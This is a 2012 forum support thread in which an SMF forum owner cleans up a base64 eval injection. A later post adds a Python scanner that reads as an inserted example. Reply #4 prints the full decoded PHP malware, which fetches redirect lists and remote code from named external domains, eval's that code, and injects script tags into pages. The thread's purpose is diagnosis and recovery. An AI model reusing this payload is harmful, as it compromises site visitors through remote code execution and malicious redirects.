Author Topic: So I just noticed my forum got hacked. (base64_decode)  (Read 3128 times)

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
So I just noticed my forum got hacked. (base64_decode)
« on: April 28, 2012, 08:18:44 PM »
Code:
<?php /**/ eval(base64_decode("..."));?>

This code is inserted in EVERY .php file and then some, lol. It redirects you to malicious websites.

Is there any way to edit it out or do I have to go through every file, manually editing each one of them? >.>

Thanks in advance. What a mess. :'(

Version: SMF 2.0 RC4

Offline Ham Radio

  • Newbie
  • *
  • Posts: 8
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #1 on: April 28, 2012, 09:27:04 PM »
I think I would just delete all the files and re-install the forum. Since everything is stored in your SQL database anyway, you won't lose anything by deleting all your files. The only thing that you will lose is pictures and avatars, so you can back up those folders, but other than that, delete them all. This happened to me recently, and that is what I did.

Offline Colin

  • Customizer
  • SMF Hero
  • *
  • Posts: 6,715
  • Gender: Male
  • SMF Customizer
    • colinschoen on GitHub
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #2 on: April 29, 2012, 12:01:34 AM »
Yep, this has been happening to many other forums.
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Offline ApplianceJunk

  • SMF Hero
  • ******
  • Posts: 3,407
    • ApplianceJunk.com
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #3 on: April 29, 2012, 12:19:51 AM »
I think I would just delete all the files and re-install the forum. Since everything is stored in your SQL database anyway, you won't lose anything by deleting all your files. The only thing that you will lose is pictures and avatars, so you can back up those folders, but other than that, delete them all. This happened to me recently, and that is what I did.

You would lose any custom work to themes and mods.

Offline SikLiFe

  • Semi-Newbie
  • *
  • Posts: 70
  • Gender: Male
    • DontVisitUs
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #4 on: April 29, 2012, 12:25:20 AM »
Code:
if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){  $_SERVER['mr_no']=1;
if(!function_exists('mrobh')){    function get_tds_777($url){$content="";
$content=@trycurl_777($url);
if($content!==false)return $content;
$content=@tryfile_777($url);
if($content!==false)return $content;
$content=@tryfopen_777($url);
if($content!==false)return $content;
$content=@tryfsockopen_777($url);
if($content!==false)return $content;
$content=@trysocket_777($url);
if($content!==false)return $content;
return '';}  function trycurl_777($url){if(function_exists('curl_init')===false)return false;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
curl_setopt ($ch, CURLOPT_HEADER, 0);
$result = curl_exec ($ch);
curl_close($ch);if ($result=="")return false;return $result;}  function tryfile_777($url){if(function_exists('file')===false)return false;
$inc=@file($url);$buf=@implode('',$inc);
if ($buf=="")return false;return $buf;}  function tryfopen_777($url){if(function_exists('fopen')===false)return false;
$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}  function tryfsockopen_777($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function trysocket_777($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function update_tds_file_777($tdsfile){$actual1=$_SERVER['s_a1'];$actual2=$_SERVER['s_a2'];$val=get_tds_777($actual1);if ($val=="")$val=get_tds_777($actual2);$f=@fopen($tdsfile,"w");if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,"|||CODE|||")){list($val,$code)=explode("|||CODE|||",$val);eval(base64_decode($code));}return $val;}  function get_actual_tds_777(){$defaultdomain=$_SERVER['s_d1'];$dir=$_SERVER['s_p1'];$tdsfile=$dir."log1.txt";if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER['s_t1']){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode("\n",$content);$c=@count($tds)+0;$url=$defaultdomain;if 
($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;}  function is_mac_777($ua){$mac=0;if (stristr($ua,"mac")||stristr($ua,"safari"))if ((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1;return $mac;}  function is_msie_777($ua){$msie=0;if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;return $msie;}    function setup_globals_777(){$rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";$mz="/tmp/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1;  global $_SERVER;    $_SERVER['s_p1']=$mz;  $_SERVER['s_b1']=$bot;  $_SERVER['s_t1']=1200;  $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8=');  $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]);  $_SERVER['s_a1']=base64_decode('aHR0cDovL2Nvb3BlcmpzdXRmOC5ydS9nX2xvYWQucGhw').$d;  $_SERVER['s_a2']=base64_decode('aHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhw').$d;  $_SERVER['s_script']="nl.php?p=d";  }      setup_globals_777();    if(!function_exists('gml_777')){  function gml_777(){    $r_string_777='';
  if ($_SERVER['s_b1']==0)$r_string_777='<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"> </script>';  return $r_string_777;  }  }     

 if(!function_exists('gzdecodeit')){  function gzdecodeit($decode){  $t=@ord(@substr($decode,3,1));  $start=10;  $v=0;  if($t&4){  $str=@unpack('v',substr($decode,10,2));  $str=$str[1];  $start+=2+$str;  }  if($t&8){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&16){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&2){  $start+=2;  }  $ret=@gzinflate(@substr($decode,$start));  if($ret===FALSE){  $ret=$decode;  }  return $ret;  }  }  function mrobh($content){  @Header('Content-Encoding: none');  $decoded_content=gzdecodeit($content);  if(preg_match('/\<\/body/si',$decoded_content)){  return preg_replace('/(\<\/body[^\>]*\>)/si',gml_777()."\n".'$1',$decoded_content);  }else{  return $decoded_content.gml_777();  }  }  ob_start('mrobh');  }  }

Sites listed in the above code. Do NOT go to these sites, but you may want to report them.

ens122zzzddazz dot com
cooperjsutf8 dot ru/g_load.php
nlinthewood dot com/g_load.php


Is there a reason why you haven't upgraded to 2.0.2?
It looks like it's creating a directory somewhere, maybe a shell in one of your folders.
« Last Edit: April 29, 2012, 12:44:39 AM by SikLiFe »
A great breakfast is always the right answer.

Offline checkmater

  • Semi-Newbie
  • *
  • Posts: 51
    • Hire web developers
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #5 on: April 29, 2012, 12:27:59 AM »
I think you can just download all of your files and use any editing software (like Dreamweaver) to search for that line and replace it with nothing (Dreamweaver can look in every file for the line and replace it, autosaving the changes, very easy to do), but I suggest you do an upgrade to the latest version.

Greetings!
SMF, other software development and some other stuff on my website; you can also hire someone at myFreelancing website. xD

Offline K@

  • Lead Support Specialist
  • SMF Master
  • *
  • Posts: 47,400
  • Gender: Male
  • Yum!
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #6 on: April 29, 2012, 09:16:29 AM »
You could restore your latest backup...

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #7 on: April 29, 2012, 11:22:09 AM »
So I erased that code from some php files, browsed through the whole board and everything seems to be working fine, no redirects so far.

http://sitecheck.sucuri.net/scanner/ This site was reporting my board as infected, not anymore. Now waiting for Google Webmaster to give me an update. Problem is, many php files still have that line.

Also, I noticed a few files have "666" permissions (index.php~, ssi_examples.php~, SSI.php~). I did some searching and apparently this is not a problem?

Changed all my passwords and decided to not store any login info on FileZilla.

Is there a reason why you haven't upgraded to 2.0.2?
I'm not really familiar with such things, so I'm kinda scared of updating.

I think you can just download all of your files and use any editing software (like Dreamweaver) to search for that line and replace it with nothing (Dreamweaver can look in every file for the line and replace it, autosaving the changes, very easy to do), but I suggest you do an upgrade to the latest version.

Greetings!
This just might be the solution, not really the best but I'll try, thanks!

Yep, this has been happening to many other forums.
Including Wordpress, but now they have a script that erases the malicious line from all php files. I noticed SMF released a similar fix in the past. (can't find the link now, meh)

You would lose any custom work to themes and mods.
This. And I have four themes with tweaks here and there. :/ Yet another reason why I don't want to update.

You could restore your latest backup...

MrPhil

  • Guest
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #8 on: April 29, 2012, 12:26:55 PM »
Do NOT use Dreamweaver to edit PHP code. It's very easy to get tangled up in the wrong mode, or not be aware of stuff that DW is doing behind your back. Learn to use a standard code editor (flat text file editor) such as ViM or Notepad++, and an FTP client such as Filezilla to upload and download. Your hosting service's control panel > file manager should have a built-in simple editor, which should be adequate for the purpose. It's probably easiest just to do it manually, file by file. As there are a number of different attacks that have been used against SMF files, it's probably not worth trying to write a general utility.

Do NOT overwrite your files with a fresh copy (Large Update) unless you don't mind losing all mods and themes. This will not wipe out your avatars and attachments. Restoring a backup will often lose recent avatars and attachments, but if you know how the restore works, it might do the job for you (especially if you limit it to restoring .php files).

After getting cleaned up, you have two tasks:
  • Make sure you do not have any unaccounted-for files hanging around that might be back doors or Trojans, that a hacker uses to gain entry. If in doubt, rename it and see if your forum still works right.
  • Find out how the hacker got in. You're a bit back-level on your SMF version, so it's possible the hacker exploited some known security hole in that version. Look at your site access logs, and consult with your host. Just for extra safety, scan all PCs used to administer your site for spyware (especially keystroke loggers and password sniffers), turn on their firewalls, and change all passwords (site access, FTP, admin account, maybe even the database).

Offline K@

  • Lead Support Specialist
  • SMF Master
  • *
  • Posts: 47,400
  • Gender: Male
  • Yum!
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #9 on: April 29, 2012, 03:20:43 PM »
If it helps, I got this hack, ages ago.

I used Textpad and I used the macro thingy, with that, along with an "autoit" script, to edit each file, without all that tedious loading/editing/saving crap.

Sadly, I deleted the script and the macro. Should be easy enough to work out, though.

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #10 on: May 02, 2012, 05:40:35 PM »
Yeah, like I said, I don't know how to work around these things; the hell is a macro? LOL I could try to learn about it but it's not as simple as tweaking SMF themes. So... I think I'll have to edit file by file, oh Lord.

Time to pump my Girls Generation discography and get my hands dirty.

I just hope I can fix everything, I'll be on the lookout for any suspicious file, thanks.

Offline K@

  • Lead Support Specialist
  • SMF Master
  • *
  • Posts: 47,400
  • Gender: Male
  • Yum!
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #11 on: May 03, 2012, 06:39:28 AM »
A macro is something you kinda "program" the text-editor to do. So, in this example, I'd get it to:

START Find the section with the rogue code in.
Delete that section of code.
Save the file.
Load the next file.
Goto START

Kinda thing.
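The macro above is a find-delete-save-next loop over every file; the decoded payload SikLiFe posted also shows what else to look for (a `.logs/` cache directory and redirect domains hidden as base64 literals), and comedorsamus mentions stray `*.php~` copies with 666 permissions. The script below is an added example, not code from this thread or from SMF, that does the same loop unattended: it finds the injected `<?php /**/ eval(base64_decode("..."));?>` prologue in every `.php` file, decodes the payload statically for review (it never evaluates it), strips the prologue while keeping a `.bak` copy, and lists the side artefacts just named. The sample site it builds under a temporary directory is constructed for the demonstration, including the harmless stand-in payload and the `redirect.example.invalid` address; all function names are this example's own.

```python
"""Triage and clean the eval(base64_decode(...)) prologue described in this thread.

Added example (not code from the thread or from SMF). Finds every .php file
carrying the prologue, decodes its payload statically (never eval'd), including
base64 literals nested inside it, strips it with a .bak copy, and flags the side
artefacts the thread mentions: "~" editor copies, world-writable files, and a
".logs/" directory (the decoded payload caches its redirect list there).
"""
import base64
import os
import re
import shutil
import tempfile
from pathlib import Path

# The one-line prologue from the first post: <?php /**/ eval(base64_decode("..."));?>
# Bytes regexes, so a non-UTF-8 source file is written back byte-for-byte.
INJECT_RE = re.compile(
    rb'<\?php\s*(?:/\*.*?\*/)?\s*eval\s*\(\s*base64_decode\s*\(\s*'
    rb'["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;\s*\?>',
    re.DOTALL,
)
# Base64 literals handed to base64_decode() inside the decoded payload.
NESTED_RE = re.compile(rb'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def decode_payload(b64):
    """Decode the eval()'d literal without executing it.
    Returns (payload_text, nested_texts); undecodable nested literals are skipped."""
    payload = base64.b64decode(b64, validate=True)
    nested = []
    for lit in NESTED_RE.findall(payload):
        try:  # binascii.Error is a ValueError subclass
            nested.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    return payload.decode("utf-8", "replace"), nested


def scan_file(path):
    """Return one finding dict per injected prologue found in `path`."""
    findings = []
    for m in INJECT_RE.finditer(Path(path).read_bytes()):
        payload, nested = decode_payload(m.group(1))
        findings.append({"file": str(path), "offset": m.start(),
                         "payload": payload, "nested": nested})
    return findings


def clean_file(path, backup_suffix=".bak"):
    """Strip every prologue from `path` after writing a backup copy.
    Returns how many prologues were removed (0 means the file was not touched)."""
    p = Path(path)
    cleaned, n = INJECT_RE.subn(b"", p.read_bytes())
    if n:
        shutil.copy2(p, p.with_name(p.name + backup_suffix))
        p.write_bytes(cleaned)
    return n


def scan_tree(root):
    """Walk `root`; return {"infected": scan_file() findings for *.php files,
    "suspicious": paths a human should account for (*~ copies, world-writable
    files, .logs directories)}."""
    report = {"infected": [], "suspicious": []}
    for dirpath, dirnames, filenames in os.walk(root):
        report["suspicious"].extend(os.path.join(dirpath, d) for d in dirnames if d == ".logs")
        for name in filenames:
            full = os.path.join(dirpath, name)
            if name.endswith(".php"):
                report["infected"].extend(scan_file(full))
            if name.endswith("~") or os.stat(full).st_mode & 0o002:
                report["suspicious"].append(full)
    return report


def build_sample_tree(root):
    """Write a CONSTRUCTED sample site under `root` (not real malware): one infected
    file, one clean file, a mode-666 file, an editor copy, and a .logs/ directory."""
    root = Path(root)
    # The constructed payload only echoes a string; its nested base64 literal stands
    # in for the redirect domains the real payload hides the same way.
    inner = base64.b64encode(b"http://redirect.example.invalid/").decode()
    payload = f'$u = base64_decode("{inner}"); echo "sample";'.encode()
    prologue = b'<?php /**/ eval(base64_decode("' + base64.b64encode(payload) + b'"));?>'
    (root / "index.php").write_bytes(prologue + b"<?php\necho 'forum';\n")
    (root / "Settings.php").write_bytes(b"<?php\n$db_name = 'smf';\n")
    (root / "SSI.php").write_bytes(b"<?php\n// clean, but world-writable\n")
    os.chmod(root / "SSI.php", 0o666)
    (root / "index.php~").write_bytes(b"<?php\n// editor backup copy\n")
    (root / ".logs").mkdir()
    (root / ".logs" / "log1.txt").write_bytes(b"cached redirect list\n")


def demo():
    """Run the workflow on the constructed tree; return (before, removed, after)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        before = scan_tree(tmp)
        removed = sum(clean_file(f) for f in {x["file"] for x in before["infected"]})
        return before, removed, scan_tree(tmp)


if __name__ == "__main__":
    before, removed, after = demo()
    for f in before["infected"]:
        print(f"{f['file']} @{f['offset']}: {f['payload']!r} nested={f['nested']}")
    print("suspicious:", *before["suspicious"], sep="\n  ")
    print(f"removed {removed} prologue(s); still infected: {len(after['infected'])}")
```

Run `scan_tree()` against a downloaded copy of the site first and read the decoded payloads before letting `clean_file()` touch anything; the `.bak` copies still contain the prologue and belong outside the web root once the cleaned files are verified. The regex is deliberately tied to the `<?php ... eval(base64_decode("..."));?>` shape from the first post, so a variant that wraps the literal differently shows up as a file the scanner does not clean, which is exactly when a human should look at it.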

Offline kachan64

  • Semi-Newbie
  • *
  • Posts: 35
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #12 on: May 03, 2012, 06:57:48 AM »
I would recommend TextPad.

Download all your files and then edit them with TextPad; after you save the files you've edited, upload them to the server again.
Looks like someone's been doing some injection to your site.

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #13 on: May 06, 2012, 12:32:29 PM »
So I think I'm done fixing everything. Found some strange files, which kinda makes me worried because I'm reading some lines referring to my (?) database, and this is something I know NOTHING about.

Did a Google search and one of the most suspicious files is exactly (?) like this one:

http://test.mare.qbfreak.net/bin/viewfile/TWiki/PatternSkinCssCookbookCenterPage?rev=;filename=wp-fika.php (safe to click?)

I'm not going to upload my file because it's huge and I'm not sure if it has login info.

And now I have one question! Should I use the Forum Maintenance > Empty Cache tool?

I would recommend TextPad.

Download all your files and then edit them with TextPad; after you save the files you've edited, upload them to the server again.
Looks like someone's been doing some injection to your site.
Thanks, great program and really easy to use.

Offline Storman™

  • Support Specialist
  • SMF Hero
  • *
  • Posts: 2,026
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #14 on: May 06, 2012, 01:06:33 PM »
Quote
And now I have one question! Should I use the Forum Maintenance > Empty Cache tool?

It won't hurt and is probably a good idea in the circumstances.

So did you go back to RC4 or did you upgrade in the end? If still on RC4, then consider doing an upgrade at some point so that you are up to date with security fixes etc.

Oh, and did you change your admin and FTP passwords, by the way?
Any backup method is better than no backup method....

Offline comedorsamus

  • Semi-Newbie
  • *
  • Posts: 40
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #15 on: May 06, 2012, 06:39:58 PM »
It won't hurt and is probably a good idea in the circumstances.

So did you go back to RC4 or did you upgrade in the end? If still on RC4, then consider doing an upgrade at some point so that you are up to date with security fixes etc.

Oh, and did you change your admin and FTP passwords, by the way?
Nope, still running RC4, but I'll read more about the update process soon.

And yes, I did change my passwords, and also checked my PC for malware (found more than a few). Now I'm gonna refresh the cache and ask my users for feedback; I hope everything is fixed.

I'll come back as soon as I get some responses. :D

MrPhil

  • Guest
Re: So I just noticed my forum got hacked. (base64_decode)
« Reply #16 on: May 06, 2012, 07:28:30 PM »
Remember to change your passwords after you've cleaned out any spyware... you don't want your new passwords sent to the hacker within seconds of your typing them in! Also enable your PC's firewall if you haven't done so already. That reduces the chances of your passwords being sent out without drawing your attention to the fact.